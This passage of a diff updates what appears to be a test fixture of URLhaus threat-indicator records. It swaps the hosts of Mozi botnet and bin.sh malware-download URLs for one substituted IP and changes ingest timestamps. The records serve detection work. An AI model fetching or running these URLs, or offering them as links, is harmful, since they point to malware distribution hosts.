listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19384,18 +19384,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.4.89.190:46221/Mozi.m", + "original": "http://89.160.20.156:46221/Mozi.m", "scheme": "http", "port": 46221, - "domain": "123.4.89.190", - "full": "http://123.4.89.190:46221/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46221/Mozi.m" }, - "ip": "123.4.89.190" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693974458Z", - "original": "{\"id\":\"961145\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961145/\",\"url\":\"http://123.4.89.190:46221/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.4.89.190\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027384700Z", + "original": "{\"id\":\"961145\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961145/\",\"url\":\"http://89.160.20.156:46221/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19433,18 +19433,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.9.108.157:51430/Mozi.m", + "original": "http://89.160.20.156:51430/Mozi.m", "scheme": "http", "port": 51430, - "domain": "123.9.108.157", - "full": "http://123.9.108.157:51430/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51430/Mozi.m" }, - "ip": "123.9.108.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693977884Z", - "original": "{\"id\":\"961146\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961146/\",\"url\":\"http://123.9.108.157:51430/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.108.157\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027391600Z", + "original": "{\"id\":\"961146\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961146/\",\"url\":\"http://89.160.20.156:51430/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19482,18 +19482,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.48.160.11:52028/Mozi.m", + "original": "http://89.160.20.156:52028/Mozi.m", "scheme": "http", "port": 52028, - "domain": "115.48.160.11", - "full": "http://115.48.160.11:52028/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52028/Mozi.m" }, - "ip": "115.48.160.11" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693981231Z", - "original": "{\"id\":\"961147\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961147/\",\"url\":\"http://115.48.160.11:52028/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.48.160.11\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027398500Z", + "original": "{\"id\":\"961147\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961147/\",\"url\":\"http://89.160.20.156:52028/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19531,18 +19531,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://125.44.61.35:48291/Mozi.a", + "original": "http://89.160.20.156:48291/Mozi.a", "scheme": "http", "port": 48291, - "domain": "125.44.61.35", - "full": "http://125.44.61.35:48291/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48291/Mozi.a" }, - "ip": "125.44.61.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693984487Z", - "original": "{\"id\":\"961148\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961148/\",\"url\":\"http://125.44.61.35:48291/Mozi.a\",\"url_status\":\"online\",\"host\":\"125.44.61.35\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027405500Z", + "original": "{\"id\":\"961148\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961148/\",\"url\":\"http://89.160.20.156:48291/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19579,18 +19579,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://202.164.138.170:39613/Mozi.m", + "original": "http://89.160.20.156:39613/Mozi.m", "scheme": "http", "port": 39613, - "domain": "202.164.138.170", - "full": "http://202.164.138.170:39613/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39613/Mozi.m" }, - "ip": "202.164.138.170" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693987823Z", - "original": "{\"id\":\"961143\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961143/\",\"url\":\"http://202.164.138.170:39613/Mozi.m\",\"url_status\":\"offline\",\"host\":\"202.164.138.170\",\"date_added\":\"2021-01-14 18:04:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027467600Z", + "original": "{\"id\":\"961143\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961143/\",\"url\":\"http://89.160.20.156:39613/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19629,18 +19629,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://219.154.108.170:34201/bin.sh", + "original": "http://89.160.20.156:34201/bin.sh", "scheme": "http", "port": 34201, - "domain": "219.154.108.170", - "full": "http://219.154.108.170:34201/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34201/bin.sh" }, - "ip": "219.154.108.170" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693991029Z", - "original": "{\"id\":\"961142\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961142/\",\"url\":\"http://219.154.108.170:34201/bin.sh\",\"url_status\":\"online\",\"host\":\"219.154.108.170\",\"date_added\":\"2021-01-14 17:56:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.027478700Z", + "original": "{\"id\":\"961142\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961142/\",\"url\":\"http://89.160.20.156:34201/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:56:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19678,18 +19678,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://220.135.95.248:47095/Mozi.a", + "original": "http://89.160.20.156:47095/Mozi.a", "scheme": "http", "port": 47095, - "domain": "220.135.95.248", - "full": "http://220.135.95.248:47095/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47095/Mozi.a" }, - "ip": "220.135.95.248" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693994105Z", - "original": "{\"id\":\"961141\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961141/\",\"url\":\"http://220.135.95.248:47095/Mozi.a\",\"url_status\":\"online\",\"host\":\"220.135.95.248\",\"date_added\":\"2021-01-14 17:53:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027486300Z", + "original": "{\"id\":\"961141\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961141/\",\"url\":\"http://89.160.20.156:47095/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19727,18 +19727,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.239.154.85:42004/Mozi.m", + "original": "http://89.160.20.156:42004/Mozi.m", "scheme": "http", "port": 42004, - "domain": "42.239.154.85", - "full": "http://42.239.154.85:42004/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42004/Mozi.m" }, - "ip": "42.239.154.85" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693997141Z", - "original": "{\"id\":\"961136\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961136/\",\"url\":\"http://42.239.154.85:42004/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.239.154.85\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027493300Z", + "original": "{\"id\":\"961136\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961136/\",\"url\":\"http://89.160.20.156:42004/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19776,18 +19776,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.203.185.42:52058/Mozi.m", + "original": "http://89.160.20.156:52058/Mozi.m", "scheme": "http", "port": 52058, - "domain": "27.203.185.42", - "full": "http://27.203.185.42:52058/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52058/Mozi.m" }, - "ip": "27.203.185.42" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694000427Z", - "original": "{\"id\":\"961137\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961137/\",\"url\":\"http://27.203.185.42:52058/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.203.185.42\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027500200Z", + "original": "{\"id\":\"961137\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961137/\",\"url\":\"http://89.160.20.156:52058/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19825,18 +19825,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://39.80.186.173:45432/Mozi.m", + "original": "http://89.160.20.156:45432/Mozi.m", "scheme": "http", "port": 45432, - "domain": "39.80.186.173", - "full": "http://39.80.186.173:45432/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45432/Mozi.m" }, - "ip": "39.80.186.173" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694003643Z", - "original": "{\"id\":\"961138\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961138/\",\"url\":\"http://39.80.186.173:45432/Mozi.m\",\"url_status\":\"online\",\"host\":\"39.80.186.173\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027507200Z", + "original": "{\"id\":\"961138\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961138/\",\"url\":\"http://89.160.20.156:45432/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19874,18 +19874,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.34.132:49891/Mozi.m", + "original": "http://89.160.20.156:49891/Mozi.m", "scheme": "http", "port": 49891, - "domain": "61.52.34.132", - "full": "http://61.52.34.132:49891/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49891/Mozi.m" }, - "ip": "61.52.34.132" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694006749Z", - "original": "{\"id\":\"961139\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961139/\",\"url\":\"http://61.52.34.132:49891/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.34.132\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027514Z", + "original": "{\"id\":\"961139\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961139/\",\"url\":\"http://89.160.20.156:49891/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19923,18 +19923,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.54.41.216:34334/Mozi.m", + "original": "http://89.160.20.156:34334/Mozi.m", "scheme": "http", "port": 34334, - "domain": "61.54.41.216", - "full": "http://61.54.41.216:34334/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34334/Mozi.m" }, - "ip": "61.54.41.216" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694010045Z", - "original": "{\"id\":\"961140\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961140/\",\"url\":\"http://61.54.41.216:34334/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.54.41.216\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027521Z", + "original": "{\"id\":\"961140\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961140/\",\"url\":\"http://89.160.20.156:34334/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19972,18 +19972,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.202:42886/Mozi.m", + "original": "http://89.160.20.156:42886/Mozi.m", "scheme": "http", "port": 42886, - "domain": "186.33.104.202", - "full": "http://186.33.104.202:42886/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42886/Mozi.m" }, - "ip": "186.33.104.202" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694013451Z", - "original": "{\"id\":\"961135\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961135/\",\"url\":\"http://186.33.104.202:42886/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.202\",\"date_added\":\"2021-01-14 17:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027528Z", + "original": "{\"id\":\"961135\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961135/\",\"url\":\"http://89.160.20.156:42886/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20021,18 +20021,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://189.51.107.141:47096/Mozi.m", + "original": "http://89.160.20.156:47096/Mozi.m", "scheme": "http", "port": 47096, - "domain": "189.51.107.141", - "full": "http://189.51.107.141:47096/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47096/Mozi.m" }, - "ip": "189.51.107.141" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694016928Z", - "original": "{\"id\":\"961134\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961134/\",\"url\":\"http://189.51.107.141:47096/Mozi.m\",\"url_status\":\"offline\",\"host\":\"189.51.107.141\",\"date_added\":\"2021-01-14 17:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027535Z", + "original": "{\"id\":\"961134\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961134/\",\"url\":\"http://89.160.20.156:47096/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20070,18 +20070,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.126.81.19:48214/Mozi.a", + "original": "http://89.160.20.156:48214/Mozi.a", "scheme": "http", "port": 48214, - "domain": "182.126.81.19", - "full": "http://182.126.81.19:48214/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48214/Mozi.a" }, - "ip": "182.126.81.19" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694020024Z", - "original": "{\"id\":\"961132\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961132/\",\"url\":\"http://182.126.81.19:48214/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.126.81.19\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027541800Z", + "original": "{\"id\":\"961132\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961132/\",\"url\":\"http://89.160.20.156:48214/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20119,18 +20119,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.122.192:40478/Mozi.m", + "original": "http://89.160.20.156:40478/Mozi.m", "scheme": "http", "port": 40478, - "domain": "186.33.122.192", - "full": "http://186.33.122.192:40478/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40478/Mozi.m" }, - "ip": "186.33.122.192" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694023180Z", - "original": "{\"id\":\"961133\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961133/\",\"url\":\"http://186.33.122.192:40478/Mozi.m\",\"url_status\":\"offline\",\"host\":\"186.33.122.192\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027548700Z", + "original": "{\"id\":\"961133\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961133/\",\"url\":\"http://89.160.20.156:40478/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20168,18 +20168,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.200.78:37771/Mozi.m", + "original": "http://89.160.20.156:37771/Mozi.m", "scheme": "http", "port": 37771, - "domain": "182.121.200.78", - "full": "http://182.121.200.78:37771/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37771/Mozi.m" }, - "ip": "182.121.200.78" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694026486Z", - "original": "{\"id\":\"961130\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961130/\",\"url\":\"http://182.121.200.78:37771/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.200.78\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027555600Z", + "original": "{\"id\":\"961130\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961130/\",\"url\":\"http://89.160.20.156:37771/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20217,18 +20217,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.124.24.207:35513/Mozi.m", + "original": "http://89.160.20.156:35513/Mozi.m", "scheme": "http", "port": 35513, - "domain": "182.124.24.207", - "full": "http://182.124.24.207:35513/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35513/Mozi.m" }, - "ip": "182.124.24.207" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694029812Z", - "original": "{\"id\":\"961131\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961131/\",\"url\":\"http://182.124.24.207:35513/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.124.24.207\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027562700Z", + "original": "{\"id\":\"961131\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961131/\",\"url\":\"http://89.160.20.156:35513/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20266,18 +20266,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.43.32.14:53382/Mozi.m", + "original": "http://89.160.20.156:53382/Mozi.m", "scheme": "http", "port": 53382, - "domain": "125.43.32.14", - "full": "http://125.43.32.14:53382/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53382/Mozi.m" }, - "ip": "125.43.32.14" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694033018Z", - "original": "{\"id\":\"961129\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961129/\",\"url\":\"http://125.43.32.14:53382/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.43.32.14\",\"date_added\":\"2021-01-14 17:51:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027569600Z", + "original": 